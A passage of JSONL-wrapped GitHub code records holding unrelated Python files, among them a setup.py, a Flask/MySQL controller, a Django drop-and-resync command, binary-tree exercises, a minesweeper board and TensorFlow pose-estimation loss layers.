seconds)\")\n","repo_name":"JuanIke/Testing","sub_path":"Tarea 2/sampler/sampler.py","file_name":"sampler.py","file_ext":"py","file_size_in_byte":1958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"74227686519","text":"import codecs\nimport os\nimport re\n\nfrom setuptools import setup, find_packages\n\n\nHERE = os.path.abspath(os.path.dirname(__file__))\n\n\ndef read(*parts): # Stolen from txacme\n with codecs.open(os.path.join(HERE, *parts), 'rb', 'utf-8') as f:\n return f.read()\n\n\ndef get_version(package):\n \"\"\"\n Return package version as listed in `__version__` in `init.py`.\n \"\"\"\n init_py = open(os.path.join(package, '__init__.py')).read()\n return re.search(\"__version__ = ['\\\"]([^'\\\"]+)['\\\"]\", init_py).group(1)\n\n\nversion = get_version('gates_subscription_mapper')\n\n\nsetup(\n name='gates-subscription-mapper',\n version=version,\n url='https://github.com/praekeltfoundation/gates-subscription-mapper',\n license='BSD',\n description='Gates Subscription Mapper',\n long_description=read('README.rst'),\n author='Praekelt.org',\n author_email='dev@praekelt.org',\n packages=find_packages(),\n include_all_package_data=True,\n install_requires=[\n 'Django==1.11.4',\n 'dj-database-url==0.4.2',\n 'raven==6.1.0',\n 'psycopg2==2.7.3',\n 'seed-services-client==0.26.0',\n 'celery==4.1.0',\n 'djangorestframework==3.6.4',\n 'rapidpro-python==2.1.8',\n 'django-widget-tweaks==1.4.1',\n ],\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Framework :: Django',\n 'License :: OSI Approved :: BSD License',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n ],\n)\n","repo_name":"praekeltfoundation/gates-subscription-mapper","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"11210204706","text":"\"\"\" Modules for Controlling Data Flow\n Use this controller only when using Mappy Type Format\n\"\"\"\n\nfrom Mappy.mysql import MysqlController, SQLBuilder\nfrom flask import abort\n\nclass Controller():\n \"\"\" Class of controller\n All data flow is recommended using Mappy Format\n \"\"\"\n\n def __init__(self, database_name, primary_key):\n self.internal_data = None\n self.database_name = database_name\n self.primary_key = primary_key\n\n def set(self, setter):\n self.internal_data = setter\n\n def get(self, data_id = False):\n \"\"\" Function for getting data from MySQL Database\n Output\n @route url/ when you not provide id, it will fetch all the data\n @route url// when id provided, it will fetch specific data\n \"\"\"\n sql_builder = SQLBuilder()\n\n if not data_id:\n sql_builder.select(\"*\", self.database_name)\n self.internal_data = self.query(sql_builder.build()).data()\n return self\n\n sql_builder.select(\"*\", self.database_name).where(f\"`{self.primary_key}` = '{data_id}'\")\n self.internal_data = self.query(sql_builder.build()).data()\n self.internal_data = self.internal_data[0] if len(self.internal_data) > 0 else {}\n return self\n\n def query_get(self, data_id = False):\n \"\"\" Function for getting data from MySQL Database\n Output\n @route url/ when you not provide id, it will fetch all the data\n @route url// when id provided, it will fetch specific data\n \"\"\"\n sql_builder = SQLBuilder()\n\n if not data_id:\n sql_builder.select(\"*\", self.database_name)\n self.internal_data = self.query(sql_builder.build()).data()\n return self\n\n sql_builder.select(\"*\", self.database_name).where(f\"`{self.primary_key}` = '{data_id}'\")\n self.internal_data = self.query(sql_builder.build()).data()\n self.internal_data = self.internal_data[0] if len(self.internal_data) > 0 else {}\n return self\n\n def empty(self):\n \"\"\" Function to empty the internal data\n Output\n Empty Data\n \"\"\"\n self.internal_data = {}\n return self\n\n def data(self):\n \"\"\" Function for getting internal data directly without __dict__ \"\"\"\n return self.internal_data\n\n def query(self, sql):\n \"\"\" Function for manipulating data with special case like create and Update\n Input\n SQL Commands\n \"\"\"\n mysql_controller = MysqlController().set_sql(sql)\n self.internal_data = mysql_controller.execute()\n return self\n\n def is_data_exists(self):\n \"\"\" Validate if data is exists or not\"\"\"\n return bool(self.internal_data)\n\n @classmethod\n def trigger_error(cls, error_code):\n \"\"\" Function to trigger if an error happened \"\"\"\n codes_dictionary = {\n \"DATA_NOT_EXISTS\" : {\n \"msg\" : \"JSON data is not exists! Please make a get() request first\",\n \"code\" : \"DATA_NOT_EXISTS\",\n \"success\" : False\n },\n \"INVALID_DATA_TYPE\" : {\n \"msg\" : \"Form data should be object of JSON for mappy\",\n \"code\" : \"INVALID_DATA_TYPE\",\n \"success\" : False\n }\n }\n abort(500, codes_dictionary[error_code])\n","repo_name":"Cleonart/JAYA_ABADI_API","sub_path":"Mappy/API/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":3469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"40272098453","text":"from app.public_views.blog import *\nfrom app.methods.blog_manager import BlogManager\n\n\n@app.route(\"/blog\", methods=[\"POST\", \"GET\"])\ndef blog():\n num = request.args.get('num')\n if num:\n num = int(num)\n else:\n num = 1\n\n blog_manager = BlogManager()\n len_posts = len(blog_manager.blog)\n if len_posts % 3 == 0:\n total_page = int(len_posts / 3)\n else:\n total_page = int(len_posts/3) + 1\n\n posts = blog_manager.blog_post_paginate(num=num)\n return render_template(\"blog/blog.html\",\n user=current_user,\n posts=posts,\n title=\"Blog\",\n num=num,\n total_page=total_page)\n","repo_name":"Stink-Po/favorite_cafe","sub_path":"app/public_views/blog/all_blog_posts_view.py","file_name":"all_blog_posts_view.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"25300419325","text":"from django.core.management.base import NoArgsCommand\nfrom django.db import connection\nfrom django.core.management import call_command\n\n\nclass Command(NoArgsCommand):\n help = \"Deletes all tables in the 'default' database.\"\n option_list = NoArgsCommand.option_list + tuple()\n\n def handle_noargs(self, **options):\n cursor = connection.cursor()\n tables = connection.introspection.django_table_names(\n only_existing=True)\n for table in tables:\n command = \"DROP TABLE %s CASCADE;\" % table\n cursor.execute(command)\n self.stderr.write(\"Executed ... %s\" % command)\n cursor.execute(\"COMMIT;\")\n self.stderr.write(\"Running syncdbmigrate ...\")\n call_command(\"syncdbmigrate\", **options)\n","repo_name":"dbca-wa/pbs","sub_path":"swingers/management/commands/drop_create_db.py","file_name":"drop_create_db.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"37025384196","text":"# Definition for a binary tree node.\r\nclass TreeNode:\r\n def __init__(self, val=0, left=None, right=None):\r\n self.val = val\r\n self.left = left\r\n self.right = right\r\n\r\n\r\ndef maxDepth(self, root: TreeNode) -> int:\r\n\r\n current = [root]\r\n following = []\r\n count = 1\r\n \r\n for node in current:\r\n if current.left != None:\r\n following.append(current.left)\r\n if current.right !=None:\r\n following.append(current.right) \r\n \r\n if following:\r\n count += 1\r\n current = following\r\n following = []\r\n \r\n # do it again.\r\n \r\n else:\r\n return count\r\n\r\n\r\n\r\n\r\ndef maxDepth2(root):\r\n nodes_list = [root]\r\n count = 0\r\n \r\n if root is None:\r\n return count\r\n\r\n while nodes_list:\r\n\r\n for x in range(len(nodes_list)):\r\n node = nodes_list.pop(0)\r\n\r\n if node.left:\r\n nodes_list.append(node.left)\r\n\r\n if node.right:\r\n nodes_list.append(node.right)\r\n\r\n \r\n count += 1\r\n return count\r\n\r\n\r\ndef maxDepth_recursive(root):\r\n if root is None:\r\n return 0\r\n else:\r\n return 1 + max(maxDepth1(root.left), maxDepth1(root.right))\r\n\r\nRoot = TreeNode(3)\r\nRoot.left = TreeNode(9)\r\nRoot.left.left = None\r\nRoot.left.right = None\r\nRoot.right = TreeNode(20)\r\nRoot.right.left = TreeNode(15)\r\nRoot.right.right = TreeNode(7)\r\nRoot.right.right.right = TreeNode(8)\r\n\r\nprint(maxDepth2(Root))\r\n\r\n# def print_binary_tree(head):\r\n# curr_left = head\r\n# curr_right = head\r\n\r\n# while curr_left != None:\r\n# print(curr.val)\r\n# curr = curr.next\r\n\r\n","repo_name":"Samrany/practice_problems","sub_path":"maximum-depth-of-binary-tree.py","file_name":"maximum-depth-of-binary-tree.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9903545210","text":"'''text based graphs\r\nTim Mostert\r\n16/04/14'''\r\n\r\nimport math\r\n\r\ny = 0\r\nx = 0\r\n\r\nfofx = input(\"Enter a function f(x):\\n\")\r\n\r\nfor row in range(10,-11,-1):\r\n for col in range(-10,11,1):\r\n x = col\r\n graph_line = round(eval(fofx))\r\n if not row == 0 and not row == graph_line and col == 0:\r\n print(\"|\",end=\"\")\r\n elif not col == 0 and not row == graph_line and row == 0:\r\n print(\"-\",end=\"\")\r\n elif row == 0 and col == 0 and not row == graph_line:\r\n print(\"+\",end=\"\")\r\n elif row == graph_line:\r\n print(\"o\",end=\"\")\r\n else:\r\n print(\" \",end=\"\")\r\n \r\n \r\n print() \r\n \r\n \r\n ","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_5/vrntim001/question4.py","file_name":"question4.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"69856750840","text":"import random\nfrom game_helper import initialize_board \nfrom game_helper import add_bombs\nfrom game_helper import add_nums\n\nclass GameBoard:\n\n # numRows: integer\n # numCols: integer\n # probability: integer\n # currentState: 2D array\n # solution: 2D array\n\n def __init__(self,numRows, numCols, probabilityOfBomb):\n self.numRows = numRows\n self.numCols = numCols\n self.probability = probabilityOfBomb\n self.currentState = initialize_board(self.numRows, self.numCols)\n soln = initialize_board(self.numRows, self.numCols)\n add_bombs(soln, self.probability)\n add_nums(soln)\n self.solution = soln\n\n \n\n def print_current_state(self):\n for row in self.currentState:\n for elt in row:\n print(elt, end=' ')\n print()\n\n # returns whether or not the move causes the user to lose\n # true: move succeeds\n # false: move fails\n def make_move(self, move_row, move_col):\n if self.solution[move_row][move_col] == \"*\":\n return False\n else:\n value = self.solution[move_row][move_col]\n self.currentState[move_row][move_col] = value\n return True\n \n","repo_name":"guyman575/CodeConnectsJacob","sub_path":"semester2/lesson3/game_board.py","file_name":"game_board.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"10349307797","text":"import sys\n\ndef input():\n return sys.stdin.readline().rstrip()\n\n\nN,M,R = map(int,input().split())\narr = [list(map(int,input().split())) for _ in range(N)]\n\n\nvisited = [[True for _ in range(M)] for _ in range(N)]\nresult = [[0 for _ in range(M)] for _ in range(N)]\ndx = [0,1,0,-1]\ndy = [1,0,-1,0]\nrotate = []\nfor k in range(min(N,M)//2):\n temp = []\n cx,cy = k,k\n d = 0\n\n while visited[cx][cy]:\n visited[cx][cy] = False\n temp.append(arr[cx][cy])\n nx,ny = cx + dx[d], cy + dy[d]\n if 0<=nx= max_loc:\n raise ValueError(\"min_loc must be less then max_loc\")\n self.loc_map_z = heatmap_1d.LocationMap(bins = self.depth_bins, min_loc=min_loc, max_loc=max_loc)\n \n \n def build(self, inputs_shape):\n print(self.name,inputs_shape)\n feature_z_shape, gt_loc_z_shape, gt_index_z_shape = inputs_shape\n self.loss_z = heatmap_1d.VarianceLocationAndPossitionLoss(self.loc_map_z.loc_delta)\n \n self.call = tf.function(self.call,input_signature=[(tf.TensorSpec(shape=[None,feature_z_shape[1],feature_z_shape[2],self.depth_bins], dtype=self.dtype),\n tf.TensorSpec(shape=[None], dtype=self.dtype),\n tf.TensorSpec(shape=[None,3], dtype=tf.int32))])\n super().build(inputs_shape)\n\n # is a @tf.function with defined input shape\n def call(self, inputs):\n features_z, gt_loc_z, gt_index_z = inputs\n \n features_z = heatmap_1d.feature_to_location_propability_map(features_z)\n loc_map_z = self.loc_map_z(0.)\n mask = heatmap_1d.mask_from_index(gt_index_z, tf.shape(features_z)[0:3])\n prop_map_z = heatmap_1d.mask_propability_map((features_z, mask))\n gt_loc_exp_z = heatmap_1d.expand_gt(gt_index_z, gt_loc_z, tf.shape(prop_map_z)[0:3])\n loc_z = heatmap_1d.propability_map_to_location(prop_map_z, loc_map_z)\n loss_z = self.loss_z(prop_map_z, loc_z, loc_map_z, gt_loc_exp_z)\n \n feature_shape = tf.shape(features_z)\n\n loss_z = tf.concat(loss_z, axis=-1)\n loss_z = tf.gather_nd(loss_z,gt_index_z)\n loss_z = tf.reshape(loss_z, [feature_shape[0],-1,2])\n \n loc_z_point = tf.gather_nd(loc_z,gt_index_z)\n loc_z_point = tf.reshape(loc_z_point, [feature_shape[0],-1,1])\n \n loc_z_point_shape = tf.shape(loc_z_point)\n \n loss_z_sum = tf.reduce_sum(loss_z) + 0.001\n loss_z_batch = tf.reduce_sum(loss_z, axis=0)\n loss_z_factor = loss_z_batch*tf.cast(loc_z_point_shape[1], dtype = self.dtype)/loss_z_sum/ self.loc_map_z.max_loc\n \n hard_kp_loss_z = loss_z*loss_z_factor\n return hard_kp_loss_z, loc_z_point\n \nclass PoseLoss2D(tf.keras.layers.Layer):\n \n def __init__(self, xy_bins, min_loc=[-150,-150], max_loc=[150, 150], name = \"PoseLoss2D\", **kwargs):\n super().__init__(name = name, **kwargs)\n self.loc_map_xy = heatmap_2d.LocationMap(bins=xy_bins, min_loc=min_loc,max_loc=max_loc, dtype=self.dtype)\n \n \n def build(self, inputs_shape):\n print(self.name,inputs_shape)\n features_xy_shape, gt_xy_shape = inputs_shape\n self.key_points = features_xy_shape[-1]\n \n self.loss_xy = heatmap_2d.VarianceLocationAndPossitionLoss(self.loc_map_xy.loc_delta)\n \n self.call = tf.function(self.call,input_signature=[(tf.TensorSpec(shape=[None,features_xy_shape[1],features_xy_shape[2],self.key_points], dtype=self.dtype),\n tf.TensorSpec(shape=[None,self.key_points,2], dtype=self.dtype))])\n super().build(inputs_shape)\n\n # is a @tf.function with defined input shape\n def call(self, inputs):\n features_xy, gt_xy = inputs\n features_xy = tf.transpose(features_xy, [3,0,1,2])\n gt_xy_per_keypoint = tf.transpose(gt_xy, [1,0,2])\n \n \n keypoint_loss_arr = tf.TensorArray(dtype=self.dtype, size=self.key_points, dynamic_size=False)\n loc_xy_arr = tf.TensorArray(dtype=self.dtype, size=self.key_points, dynamic_size=False)\n \n for kp in tf.range(self.key_points):\n feature_xy = features_xy[kp]\n gt_loc_xy = gt_xy_per_keypoint[kp]\n \n feature_xy = tf.expand_dims(feature_xy,axis=-1)\n feature_xy = heatmap_2d.feature_to_location_propability_map(feature_xy)\n loc_map_xy = self.loc_map_xy([0.,0.])\n loc_xy = heatmap_2d.propability_map_to_location(feature_xy,loc_map_xy)\n loss_xy = self.loss_xy(feature_xy, loc_xy, loc_map_xy, gt_loc_xy)\n keypoint_loss_arr = keypoint_loss_arr.write(kp,loss_xy)\n loc_xy_arr = loc_xy_arr.write(kp,loc_xy)\n loss_xy = keypoint_loss_arr.stack()\n loss_xy = tf.transpose(loss_xy,[2,0,1])\n loc_xy = loc_xy_arr.stack()\n loc_xy = tf.transpose(loc_xy,[1,0,2])\n \n loss_xy_sum = (tf.reduce_sum(loss_xy)+0.001)\n loss_xy_batch = tf.reduce_sum(loss_xy, axis=0)\n loss_xy_factor = loss_xy_batch*tf.cast(self.key_points, dtype = self.dtype)/loss_xy_sum / self.loc_map_xy.max_loc\n \n hard_kp_loss_xy = loss_xy*loss_xy_factor\n \n return hard_kp_loss_xy, loc_xy\n\nclass PoseLoss(tf.keras.layers.Layer):\n \n def __init__(self, key_points = 15, depth_bins = 10, xyz_min=[-150,-150,-150], xyz_max=[150,150,150], name = \"PoseLoss\", **kwargs):\n super().__init__(name = name, **kwargs)\n self.key_points = tf.cast(key_points, dtype = tf.int32)\n self.depth_bins = tf.cast(depth_bins, dtype = self.dtype)\n self.xyz_min = tf.cast(xyz_min, dtype = tf.int32)\n self.xyz_max = tf.cast(xyz_max, dtype = tf.int32)\n \n \n def build(self, inputs_shape):\n print(self.name,inputs_shape)\n feature_shape = inputs_shape[0]\n self.pose_loss_xy = PoseLoss2D(feature_shape[1:3], min_loc = self.xyz_min[:-1], max_loc = self.xyz_max[:-1])\n self.pose_loss_z = PoseLossDepth(self.depth_bins, min_loc = self.xyz_min[-1], max_loc = self.xyz_max[-1])\n \n self.xy_loc_delta = self.pose_loss_xy.loc_map_xy.loc_delta\n self.xy_min_loc = self.pose_loss_xy.loc_map_xy.min_loc\n self.xy_bins = self.pose_loss_xy.loc_map_xy.bins\n \n self.z_loc_delta = self.pose_loss_z.loc_map_z.loc_delta\n self.z_min_loc = self.pose_loss_z.loc_map_z.min_loc\n self.z_bins = self.pose_loss_z.loc_map_z.bins\n \n self.kp_to_gt = KeypointBatchToPoseGT(self.xy_loc_delta, self.xy_min_loc, self.xy_bins,\n self.z_loc_delta, self.z_min_loc, self.z_bins)\n \n self.call = tf.function(self.call,input_signature=[(tf.TensorSpec(shape=[None,feature_shape[1],feature_shape[2],self.key_points+tf.cast(self.depth_bins, dtype = tf.int32)], dtype=self.dtype),\n tf.TensorSpec(shape=[None,self.key_points,3], dtype=self.dtype))])\n super().build(inputs_shape)\n\n # is a @tf.function with defined input shape\n def call(self, inputs):\n feature, gt_kp = inputs\n features_xy = feature[:,:,:,:self.key_points]\n features_z = feature[:,:,:,self.key_points:]\n\n\n gt_xy, gt_loc_z, gt_index_z = self.kp_to_gt(gt_kp)\n \n hard_kp_loss_xy, loc_xy = self.pose_loss_xy([features_xy, gt_xy])\n hard_kp_loss_z, loc_z = self.pose_loss_z([features_z, gt_loc_z, gt_index_z])\n \n loc_xyz = tf.concat([loc_xy,loc_z],axis=-1)\n \n #TODO transform to real space before sym loss\n #limbs = limb_length(loc_xyz)\n #sym_loss = symmetry_loss(limbs)\n \n return hard_kp_loss_xy, hard_kp_loss_z, loc_xyz\n\nclass PersonPosFromPose(tf.keras.layers.Layer):\n def __init__(self, name = \"PersonPosFromPose\", **kwargs):\n super().__init__(name = name, **kwargs)\n \n def build(self, inputs_shape):\n print(self.name,inputs_shape) \n super().build(inputs_shape)\n self.call = tf.function(self.call,input_signature=[(tf.TensorSpec([None, 15, 3],dtype=self.dtype))])\n \n # is a @tf.function with defined input shape\n def call(self, inputs):\n person_poses = inputs\n print(\"tracing\", self.name,person_poses.shape)\n \n person_pos = tf.reduce_mean(person_poses,axis=1)\n \n return person_pos\n \nperson_pos_from_pose = PersonPosFromPose()\n\nclass PersonPosToIndexes(tf.keras.layers.Layer):\n def __init__(self, name = \"PersonPosToIndexes\", **kwargs):\n super().__init__(name = name, **kwargs)\n \n def build(self, inputs_shape):\n print(self.name,inputs_shape)\n super().build(inputs_shape)\n self.call = tf.function(self.call,input_signature=[(tf.TensorSpec([None],dtype=self.dtype),tf.TensorSpec([None, 3],dtype=self.dtype)),tf.TensorSpec([3],dtype=tf.int32),tf.TensorSpec([3],dtype=self.dtype),tf.TensorSpec([3],dtype=self.dtype)])\n \n def call(self, inputs, max_indexes, min_loc_xyz, loc_delta_xyz):\n batch_index, person_pos = inputs\n print(\"tracing\", self.name, batch_index.shape, person_pos.shape)\n print(\"and params\", max_indexes.shape, min_loc_xyz.shape, loc_delta_xyz.shape)\n \n indices = (person_pos - min_loc_xyz) / loc_delta_xyz\n indices = tf.maximum(indices, 0)\n max_index = tf.cast(max_indexes, dtype=self.dtype)\n indices = tf.minimum(indices, max_index)\n batch_index = tf.expand_dims(batch_index,axis=1)\n indices = tf.concat([batch_index,indices],axis=-1)\n indices = tf.cast(indices + 0.5, dtype=tf.int64)\n return indices\n\nperson_pos_to_indexes = PersonPosToIndexes()\n\nclass PersonPosToHeatMap(tf.keras.layers.Layer):\n def __init__(self, name = \"PersonPosToHeatMap\", **kwargs):\n super().__init__(name = name, **kwargs)\n \n def build(self, inputs_shape):\n print(self.name,inputs_shape)\n super().build(inputs_shape)\n \n @tf.function(experimental_autograph_options=tf.autograph.experimental.Feature.ALL, experimental_relax_shapes=True)\n def call(self, inputs, feature_shape, min_loc_xyz, loc_delta_xyz):\n batch_index, person_pos = inputs\n print(\"tracing\", self.name ,batch_index.shape, person_pos.shape)\n print(self.dtype, batch_index.dtype, person_pos.dtype)\n \n max_indexes = feature_shape[1:] - 1\n indices = person_pos_to_indexes([batch_index, person_pos],max_indexes, min_loc_xyz, loc_delta_xyz)\n heat_map = tf.SparseTensor(indices = indices, values = tf.ones(tf.shape(indices)[0], dtype=self.dtype), dense_shape = tf.cast(feature_shape, dtype =tf.int64))\n heat_map = tf.sparse.to_dense(heat_map, validate_indices=False)\n return heat_map\n\nclass HeatMapToWeights(tf.keras.layers.Layer):\n def __init__(self, name = \"HeatMapToWeights\", **kwargs):\n super().__init__(name = name, **kwargs)\n \n def build(self, inputs_shape):\n print(self.name,inputs_shape)\n super().build(inputs_shape)\n \n @tf.function(experimental_autograph_options=tf.autograph.experimental.Feature.ALL, experimental_relax_shapes=True)\n def call(self, inputs):\n heatmap = inputs\n heatmap_shape = tf.shape(heatmap)\n ones = tf.ones(heatmap_shape, dtype=self.dtype)\n \n heatmap_3d = tf.expand_dims(heatmap,axis=-1)\n \n heatmap_3d_cast = tf.cast(heatmap_3d, dtype=tf.float32) #FIX Tf Maxpool does not support Float64\n dilated_heatmap_3d_cast = tf.nn.max_pool3d(heatmap_3d_cast, ksize=3, strides=1, padding=\"SAME\", name='dilation')\n dilated_heatmap_3d = tf.cast(dilated_heatmap_3d_cast, dtype=self.dtype)\n \n dilated_heatmap = dilated_heatmap_3d[...,0]\n \n nr_persons = tf.reduce_sum(heatmap, axis=[1,2,3])\n nr_non_zeros = nr_persons * 3*3*3\n nr_positions = tf.cast(tf.reduce_prod(heatmap_shape[1:]),dtype=self.dtype)\n scale_negative = nr_non_zeros / nr_positions\n scale_positive = 1 - nr_persons / nr_positions\n scale_negative = tf.reshape(scale_negative,[-1,1,1,1])\n scale_positive = tf.reshape(scale_positive,[-1,1,1,1])\n \n negative_weights = (ones - dilated_heatmap) * scale_negative\n positive_weights = heatmap * scale_positive\n weights = negative_weights + positive_weights\n return weights\n\nclass PersonLoss(tf.keras.layers.Layer):\n def __init__(self, name = \"PersonLoss\", **kwargs):\n super().__init__(name = name, **kwargs)\n \n def build(self, inputs_shape):\n print(self.name,inputs_shape)\n feature_shape, (batch_index_shape, pos_shape) = inputs_shape\n \n self.heat_map_to_weights = HeatMapToWeights(dtype=self.dtype)\n self.person_pos_to_heat_map = PersonPosToHeatMap(dtype=self.dtype)\n\n \n self.call = tf.function(self.call,input_signature=[(tf.TensorSpec(shape=[None,feature_shape[1],feature_shape[2],feature_shape[3]], dtype=self.dtype),\n (tf.TensorSpec(shape=[None], dtype=self.dtype),\n tf.TensorSpec(shape=[None,pos_shape[1]], dtype=self.dtype))),\n tf.TensorSpec(shape=[3], dtype=self.dtype),\n tf.TensorSpec(shape=[3], dtype=self.dtype)])\n super().build(inputs_shape)\n \n \n # is a @tf.function with defined input shape\n def call(self, inputs, min_loc_xyz, loc_delta_xyz):\n feature, (batch_index, person_pos) = inputs\n feature_shape = tf.shape(feature)\n heat_map = self.person_pos_to_heat_map((batch_index, person_pos), feature_shape, min_loc_xyz, loc_delta_xyz)\n loss_weights = self.heat_map_to_weights(heat_map)\n se = (feature - heat_map)**2\n weighted_loss = se * loss_weights\n nr_persons = tf.reduce_sum(heat_map, axis=[1,2,3])\n loss = tf.reduce_sum(weighted_loss, axis=[1,2,3]) / nr_persons\n return loss\n\ndef main():\n #tf.config.experimental_run_functions_eagerly(True)\n test_pose_loss()\n test_pos_loss()\n \ndef test_pos_loss():\n min_loc_xyz=tf.constant([0,0,50],dtype=tf.float32)\n loc_delta_xyz=tf.constant([150,150,150],dtype=tf.float32)\n batches = 4\n feature = np.zeros([batches,10,10,10],dtype=np.float32)\n \n pos_01=tf.constant([5,5,5],dtype=tf.float32)\n pos_02=tf.constant([2,2,8],dtype=tf.float32)\n pos_11=tf.constant([8,1,0],dtype=tf.float32)\n pos_12=tf.constant([3,7,1],dtype=tf.float32)\n pos_21=tf.constant([5,5,0],dtype=tf.float32)\n pos_31=tf.constant([5,5,0],dtype=tf.float32)\n pos_32=tf.constant([7,7,0],dtype=tf.float32)\n \n feature[0,5,5,5]=1\n feature[0,2,2,8]=1\n feature[1,8,1,0]=1\n feature[1,3,7,1]=0.8\n feature[2,3,3,0]=1\n feature[3,5,5,0]=1\n feature[3,7,7,0]=1\n \n feature = tf.cast(feature, dtype=tf.float32)\n \n person_poses = [[min_loc_xyz+loc_delta_xyz*pos_01 for _ in range(15)],\n [min_loc_xyz+loc_delta_xyz*pos_02 for _ in range(15)],\n [min_loc_xyz+loc_delta_xyz*pos_11 for _ in range(15)],\n [min_loc_xyz+loc_delta_xyz*pos_12 for _ in range(15)],\n [min_loc_xyz+loc_delta_xyz*pos_21 for _ in range(15)],\n [min_loc_xyz+loc_delta_xyz*pos_31 for _ in range(15)],\n [min_loc_xyz+loc_delta_xyz*pos_32 for _ in range(15)]]\n \n person_poses = tf.cast(person_poses, dtype=tf.float32)\n \n batch_indexes = tf.cast([0,0,1,1,2,3,3], dtype=tf.float32)\n \n person_pos = person_pos_from_pose(person_poses)\n \n pos_loss = person_loss([feature,(batch_indexes, person_pos)],min_loc_xyz,loc_delta_xyz)\n print(pos_loss)\n \n feature = tf.Variable(np.ones([batches,10,10,10]), trainable=True, dtype=tf.float32)\n \n optimizer = tf.keras.optimizers.Adam(learning_rate=0.1)\n\n @tf.function\n def train_loop(epochs):\n for epoch in tf.range(epochs):\n with tf.GradientTape() as tape:\n loss = person_loss([feature,(batch_indexes, person_pos)],min_loc_xyz,loc_delta_xyz)\n \n gradients = tape.gradient(loss, feature)\n [capped_gradients], _ = tf.clip_by_global_norm([gradients], 10.)\n optimizer.apply_gradients([(capped_gradients,feature)])\n tf.print(loss)\n \n train_loop(500)\n \n heat_map = person_pos_to_heat_map((batch_indexes, person_pos), tf.shape(feature),min_loc_xyz, loc_delta_xyz)\n pos_gt = tf.unstack(heat_map,axis=0)\n pos_maps = tf.unstack(feature,axis=0)\n for pos_batch, gt_batch in zip(pos_maps, pos_gt):\n for pos, gt in zip(pos_batch, gt_batch):\n plt.imshow(tf.concat([pos, gt],axis=-1))\n plt.show()\n\n\ndef test_pose_loss():\n batches = 4\n keypoints = 15\n feature = np.zeros([batches,10,10,10+keypoints],dtype=tf.float32)\n #x\n feature[0,5,5,0]=0.5\n feature[0,6,6,0]=0.5\n feature[1,4,4,0]=0.5\n feature[1,7,7,0]=0.5\n feature[2,5,5,0]=1\n feature[3,5,5,0]=1\n feature[3,6,6,0]=1\n \n #z\n feature[0,6,6,keypoints+5]=0.5\n feature[0,6,6,keypoints+6]=0.5\n feature[1,6,6,keypoints+4]=0.5\n feature[1,6,6,keypoints+7]=0.5\n feature[2,5,5,keypoints+5]=1\n feature[3,6,6,keypoints+5]=1\n feature[3,6,6,keypoints+6]=1\n \n x = y = z = 1500 - 1500\n kp_gt = tf.constant([[ [x,y,z] for kp in range(keypoints)] for b in range(batches)],dtype = tf.float32)\n \n tl = PoseLoss()\n \n loss = tl([feature,kp_gt])\n loss = tl([feature,kp_gt])\n \n batches = 2\n x = y = z = 250 - 1500\n kp_gt = tf.constant([[ [x+545*kp,y+504*kp,z+200*kp] for kp in range(keypoints)] for b in range(batches)],dtype = tf.float32)\n \n \n feature = tf.Variable(np.ones([batches,10,10,10+keypoints]), trainable=True, dtype=tf.float32)\n \n optimizer = tf.keras.optimizers.Adam(learning_rate=0.1)\n\n @tf.function\n def train_loop(epochs):\n for epoch in tf.range(epochs):\n with tf.GradientTape() as tape:\n loss = tl([feature,kp_gt])\n \n gradients = tape.gradient(loss, feature)\n [capped_gradients], _ = tf.clip_by_global_norm([gradients], 10.)\n optimizer.apply_gradients([(capped_gradients,feature)])\n tf.print(loss)\n \n train_loop(100)\n \n kp_to_gt = KeypointBatchToPoseGT(tl.xy_loc_delta, tl.xy_min_loc, tl.xy_bins, tl.z_loc_delta, tl.z_min_loc, tl.z_bins)\n gt_xy, gt_loc_z, gt_index_z = kp_to_gt(kp_gt)\n prob_maps = tf.unstack(feature,axis=-1)\n kps = tf.unstack(gt_xy,axis=1)\n for prob_map_batch, kp_batch in zip(prob_maps, kps):\n prob_map_batch = heatmap_2d.feature_to_location_propability_map(prob_map_batch)\n loc_map_xy = tl.pose_loss_xy.loc_map_xy([0.,0.])\n loc_xy_batch = heatmap_2d.propability_map_to_location(tf.expand_dims(prob_map_batch,axis=-1),loc_map_xy)\n for prob_map, kp, loc in zip(prob_map_batch,kp_batch,loc_xy_batch):\n print(kp, loc)\n plt.imshow(prob_map)\n plt.show()\n \n feature_z = feature[...,keypoints:]\n prop_map_z = heatmap_1d.feature_to_location_propability_map(feature_z)\n\n gt_loc_z = heatmap_1d.expand_gt(gt_index_z, gt_loc_z, tf.shape(prop_map_z)[0:3])\n \n loc_map_z = tl.pose_loss_z.loc_map_z(0.)\n loc_z = heatmap_1d.propability_map_to_location(prop_map_z, loc_map_z)\n for kp, loc in zip(gt_loc_z,loc_z):\n plt.imshow(tf.concat([kp[...,0],loc[...,0]],axis=1))\n plt.show()\n \n\nclass LossTestTrainingsModel(tf.keras.layers.Layer):\n def __init__(self, keypoints = 15, depth_bins = 10):\n super().__init__()\n self.keypoints = tf.cast(keypoints, dtype = tf.int32)\n self.depth_bins = tf.cast(depth_bins, dtype = tf.int32)\n \n def build(self, inputs_shape):\n feature_shape, gt_shape = inputs_shape\n self.representation = tf.Variable(tf.ones([1, 10, 10, 